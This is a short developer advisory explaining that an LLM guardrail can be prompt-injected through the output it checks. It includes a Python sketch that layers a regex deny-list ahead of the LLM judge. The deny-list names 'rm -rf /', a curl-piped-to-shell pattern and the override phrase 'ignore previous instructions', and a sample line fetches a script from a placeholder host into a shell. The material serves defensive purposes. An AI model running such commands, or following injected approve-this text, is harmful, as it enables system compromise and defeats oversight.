Report #30796
[gotcha] Using an LLM as a guardrail to filter another LLM's output
Do not rely solely on an LLM to judge or filter another LLM's output for safety. Use deterministic checks (regex, string matching) or small specialized classifiers to catch known bad patterns, and treat an LLM guardrail only as a secondary, fallible layer whose approval can never override a deterministic block.
Journey Context:
Developers often use a 'guardrail LLM' to check whether the primary LLM's output contains malicious code or injections. However, the guardrail LLM reads that output as part of its own prompt, so it is susceptible to the same prompt injections and jailbreaks as the primary LLM. An attacker can craft a payload that instructs the primary LLM to emit a secondary injection aimed at the guardrail LLM, causing the guardrail to approve the malicious output.
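The layering described above can be sketched as follows. This is a minimal illustration, not a vetted filter: the names DENY_PATTERNS, deterministic_check, and is_output_allowed are hypothetical, the patterns are examples rather than a complete deny-list, and llm_judge stands in for whatever guardrail model call you already have. The point it shows is ordering: the deterministic check runs first and its block is final, so an injected "approve this" message cannot reach a layer that is able to override it.

```python
import re
from typing import Callable, Optional

# Hypothetical deny-list. These patterns are illustrative only and are
# nowhere near exhaustive; a real list would be maintained per application.
DENY_PATTERNS = [
    re.compile(r"rm\s+-rf\s+/", re.IGNORECASE),
    re.compile(r"curl\s+[^|\n]*\|\s*(ba)?sh", re.IGNORECASE),
    re.compile(r"ignore\s+(all\s+)?(previous|prior)\s+instructions", re.IGNORECASE),
]


def deterministic_check(text: str) -> Optional[str]:
    """Return the first deny pattern that matches, or None if none match."""
    for pattern in DENY_PATTERNS:
        if pattern.search(text):
            return pattern.pattern
    return None


def is_output_allowed(
    text: str,
    llm_judge: Optional[Callable[[str], bool]] = None,
) -> bool:
    """Decide whether the primary model's output may be passed on.

    llm_judge is an assumed callable wrapping a guardrail model; it returns
    True when the guardrail approves the text.
    """
    # Layer 1: deterministic. A match is a hard block, and the LLM judge
    # is never consulted, so it cannot be talked into approving the text.
    if deterministic_check(text) is not None:
        return False

    # Layer 2: LLM guardrail, treated as fallible. It can only add
    # rejections on top of layer 1, and any failure is treated as a reject.
    if llm_judge is not None:
        try:
            return bool(llm_judge(text))
        except Exception:
            return False

    return True
```

For example, a guardrail that has been successfully injected and approves everything (modelled here as lambda text: True) still cannot release output containing "curl http://x.example/a.sh | sh", because the deterministic layer rejects it before the judge is called. Output that matches no known pattern still depends on the fallible LLM layer, which is why that layer should not be the only control.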
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T06:04:27.408271+00:00— report_created — created